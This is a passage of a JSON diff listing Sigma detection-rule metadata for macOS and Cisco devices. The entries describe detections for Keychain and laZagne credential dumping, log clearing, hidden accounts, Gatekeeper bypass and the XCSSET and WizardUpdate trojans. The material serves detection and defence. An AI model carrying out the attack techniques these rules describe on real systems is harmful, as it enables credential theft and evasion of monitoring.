+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070.002"
+ ]
+ },
+ "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa",
+ "value": "Indicator Removal on Host - Clear Mac System Logs"
+ },
+ {
+ "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/06",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_create_account.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"
+ ],
+ "tags": [
+ "attack.t1136.001",
+ "attack.persistence"
+ ]
+ },
+ "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731",
+ "value": "Creation Of A Local User Account"
+ },
+ {
+ "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option",
+ "meta": {
+ "author": "Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2020/10/10",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_create_hidden_account.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.002"
+ ]
+ },
+ "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3",
+ "value": "Hidden User Creation"
+ },
+ {
+ "description": "Detects passwords dumps from Keychain",
+ "meta": {
+ "author": "Tim Ismilyaev, oscd.community, Florian Roth",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": 
"proc_creation_macos_creds_from_keychain.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
+ "https://gist.github.com/Capybara/6228955",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1555.001"
+ ]
+ },
+ "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955",
+ "value": "Credentials from Password Stores - Keychain"
+ },
+ {
+ "description": "Detects disabling security tools",
+ "meta": {
+ "author": "Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Legitimate activities"
+ ],
+ "filename": "proc_creation_macos_disable_security_tools.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0",
+ "value": "Disable Security Tools"
+ },
+ {
+ "description": "Detects usage of system utilities to discover files and directories",
+ "meta": {
+ "author": "Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Legitimate activities"
+ ],
+ "filename": "proc_creation_macos_file_and_directory_discovery.yml",
+ "level": "informational",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1083"
+ ]
+ },
+ "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6",
+ "value": "File and Directory Discovery - MacOS"
+ },
+ {
+ "description": "Detecting attempts to extract passwords with grep and laZagne",
+ "meta": {
+ "author": "Igor Fits, Mikhail Larin, oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_macos_find_cred_in_files.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1552.001"
+ ]
+ },
+ "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4",
+ "value": "Credentials In Files"
+ },
+ {
+ "description": "Detects attempts to use system dialog prompts to capture user credentials",
+ "meta": {
+ "author": "remotephone, oscd.community",
+ "creation_date": "2020/10/13",
+ "falsepositive": [
+ "Legitimate administration tools and activities"
+ ],
+ "filename": "proc_creation_macos_gui_input_capture.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md",
+ "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1056.002"
+ ]
+ },
+ "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541",
+ "value": 
"GUI Input Capture - macOS"
+ },
+ {
+ "description": "Detects enumeration of local systeam accounts on MacOS",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/08",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_local_account.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1087.001"
+ ]
+ },
+ "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c",
+ "value": "Local System Accounts Discovery - MacOs"
+ },
+ {
+ "description": "Detects enumeration of local system groups",
+ "meta": {
+ "author": "Ömer Günal, Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/11",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_local_groups.yml",
+ "level": "informational",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1069.001"
+ ]
+ },
+ "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276",
+ "value": "Local Groups Discovery - MacOs"
+ },
+ {
+ "description": "Detects enumeration of local or remote network services.",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/21",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_network_service_scanning.yml",
+ "level": 
"low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1046"
+ ]
+ },
+ "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f",
+ "value": "MacOS Network Service Scanning"
+ },
+ {
+ "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/14",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_network_sniffing.yml",
+ "level": "informational",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.credential_access",
+ "attack.t1040"
+ ]
+ },
+ "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043",
+ "value": "Network Sniffing - MacOs"
+ },
+ {
+ "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. 
This behavior is consistent with adware or malware families such as Bundlore and Shlayer.",
+ "meta": {
+ "author": "Tim Rauch (rule), Elastic (idea)",
+ "creation_date": "2022/10/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml"
+ ],
+ "tags": [
+ "attack.t1059",
+ "attack.t1204",
+ "attack.execution",
+ "attack.t1140",
+ "attack.defense_evasion",
+ "attack.s0482",
+ "attack.s0402"
+ ]
+ },
+ "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca",
+ "value": "Payload Decoded and Decrypted via Built-in Utilities"
+ },
+ {
+ "description": "Detects the enumeration of other remote systems.",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/22",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_remote_system_discovery.yml",
+ "level": "informational",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1018"
+ ]
+ },
+ "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad",
+ "value": "Macos Remote System Discovery"
+ },
+ {
+ "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.",
+ "meta": {
+ "author": "Alejandro Ortuno, oscd.community",
+ "creation_date": "2020/10/06",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_macos_schedule_task_job_cron.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1053.003"
+ ]
+ },
+ "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460",
+ "value": "Scheduled Cron Task/Job - MacOs"
+ },
+ {
+ "description": "Detects attempts to use screencapture to collect macOS screenshots",
+ "meta": {
+ "author": "remotephone, oscd.community",
+ "creation_date": "2020/10/13",
+ "falsepositive": [
+ "Legitimate user activity taking screenshots"
+ ],
+ "filename": "proc_creation_macos_screencapture.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
+ "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1113"
+ ]
+ },
+ "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7",
+ "value": "Screen Capture - macOS"
+ },
+ {
+ "description": "Detects usage of system utilities (only grep for now) to discover security software discovery",
+ "meta": {
+ "author": "Daniil Yugoslavskiy, 
oscd.community",
+ "creation_date": "2020/10/19",
+ "falsepositive": [
+ "Legitimate activities"
+ ],
+ "filename": "proc_creation_macos_security_software_discovery.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1518.001"
+ ]
+ },
+ "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0",
+ "value": "Security Software Discovery - MacOs"
+ },
+ {
+ "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.",
+ "meta": {
+ "author": "remotephone",
+ "creation_date": "2021/11/20",
+ "falsepositive": [
+ "Mistyped commands or legitimate binaries named to match the pattern"
+ ],
+ "filename": "proc_creation_macos_space_after_filename.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.006"
+ ]
+ },
+ "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690",
+ "value": "Space After Filename - macOS"
+ },
+ {
+ "description": "Detection use of the command \"split\" to split files into parts and possible transfer.",
+ "meta": {
+ "author": "Igor Fits, Mikhail Larin, oscd.community",
+ "creation_date": "2020/10/15",
+ "falsepositive": [
+ "Legitimate administrative activity"
+ ],
+ "filename": "proc_creation_macos_split_file_into_pieces.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1030"
+ ]
+ },
+ "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12",
+ "value": "Split A File Into Pieces"
+ },
+ {
+ "description": "Detects when the macOS Script Editor utility spawns an unusual child process.",
+ "meta": {
+ "author": "Tim Rauch (rule), Elastic (idea)",
+ "creation_date": "2022/10/21",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "macos",
+ "refs": [
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685",
+ "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml"
+ ],
+ "tags": [
+ "attack.t1566",
+ "attack.t1566.002",
+ "attack.initial_access",
+ "attack.t1059",
+ "attack.t1059.002",
+ "attack.t1204",
+ "attack.t1204.001",
+ "attack.execution",
+ "attack.persistence",
+ "attack.t1553",
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4",
+ "value": "Suspicious Execution via macOS Script Editor"
+ },
+ {
+ "description": "Detects commandline operations on shell history files",
+ "meta": {
+ "author": "Mikhail Larin, oscd.community",
+ "creation_date": "2020/10/17",
+ "falsepositive": [
+ "Legitimate administrative activity",
+ "Legitimate software, cleaning hist file"
+ ],
+ "filename": "proc_creation_macos_susp_histfile_operations.yml",
+ 
"level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "508a9374-ad52-4789-b568-fc358def2c65", + "value": "Suspicious History File Operations" + }, + { + "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", + "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", + "value": "Suspicious MacOS Firmware Activity" + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_system_network_connections_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + 
"logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", + "value": "System Network Connections Discovery - MacOs" + }, + { + "description": "Detects enumeration of local network configuration", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_system_network_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", + "value": "System Network Discovery - macOS" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "proc_creation_macos_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", + "value": "System Shutdown/Reboot - MacOs" + }, + { + "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", + "value": "Potential WizardUpdate Malware Infection" + }, + { + "description": "Detects macOS Gatekeeper bypass via xattr utility", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.001" + ] + }, + "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", + "value": "Gatekeeper Bypass via Xattr" + }, + { + "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_xcsset_malware_infection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", + "value": "Potential XCSSET Malware Infection" + }, + { + "description": "Clear command history in network OS which is used for defense evasion", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "filename": "cisco_cli_clear_logs.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", + "value": "Cisco Clear Logs" + }, + { + "description": "Collect pertinent data from the configuration files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Commonly run by administrators" + ], + "filename": "cisco_cli_collect_data.yml", + "level": "low", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.collection", + "attack.t1087.001", + "attack.t1552.001", + "attack.t1005" + ] + }, + "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", + "value": "Cisco Collect Data" + }, + { + "description": "Show when private keys are being exported from the device, or when new certificates are installed", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Not commonly run by administrators. 
Also whitelist your known good certificates" + ], + "filename": "cisco_cli_crypto_actions.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1553.004", + "attack.t1552.004" + ] + }, + "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", + "value": "Cisco Crypto Commands" + }, + { + "description": "Turn off logging locally or remote", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "cisco_cli_disable_logging.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", + "value": "Cisco Disabling Logging" + }, + { + "description": "Find information about network devices that is not stored in config files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Commonly used by administrators for troubleshooting" + ], + "filename": "cisco_cli_discovery.yml", + "level": "low", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083", + "attack.t1201", + "attack.t1057", + "attack.t1018", + "attack.t1082", + "attack.t1016", + "attack.t1049", + "attack.t1033", + "attack.t1124" + ] + }, + "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", + "value": "Cisco Discovery" + }, + { + "description": "Detect a system being shutdown or put into different boot mode", + "meta": { + "author": 
"Austin Clark", + "creation_date": "2019/08/15", + "falsepositive": [ + "Legitimate administrators may run these commands, though rarely." + ], + "filename": "cisco_cli_dos.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" + ], + "tags": [ + "attack.impact", + "attack.t1495", + "attack.t1529", + "attack.t1565.001" + ] + }, + "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", + "value": "Cisco Denial of Service" + }, + { + "description": "See what files are being deleted from flash file systems", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Will be used sometimes by admins to clean up local flash space" + ], + "filename": "cisco_cli_file_deletion.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070.004", + "attack.t1561.001", + "attack.t1561.002" + ] + }, + "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", + "value": "Cisco File Deletion" + }, + { + "description": "See what commands are being input into the device by other people, full credentials can be in the history", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Not commonly run by administrators, especially if remote logging is configured" + ], + "filename": "cisco_cli_input_capture.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" + ], + 